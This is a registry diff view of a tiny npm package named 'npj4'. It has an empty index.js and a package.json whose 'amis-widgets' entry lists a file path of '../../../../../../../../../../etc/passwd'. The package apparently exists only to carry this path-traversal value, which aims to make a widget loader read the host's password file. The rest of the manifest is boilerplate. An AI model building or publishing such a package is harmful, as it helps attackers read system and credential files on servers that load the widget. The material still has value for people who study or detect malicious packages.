npj4 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +0 -0
- package/package.json +22 -0
package/index.js
ADDED
File without changes
|
package/package.json
ADDED
@@ -0,0 +1,22 @@
|
|
1
|
+
{
|
2
|
+
"name": "npj4",
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"amis-widgets":[
|
7
|
+
{
|
8
|
+
"name":"test",
|
9
|
+
"framework":"vue",
|
10
|
+
"usage":"renderer",
|
11
|
+
"entry":"/dist/infocard.umd",
|
12
|
+
"files":[
|
13
|
+
"../../../../../../../../../../etc/passwd"
|
14
|
+
]
|
15
|
+
}],
|
16
|
+
|
17
|
+
"scripts": {
|
18
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
19
|
+
},
|
20
|
+
"author": "",
|
21
|
+
"license": "ISC"
|
22
|
+
}
|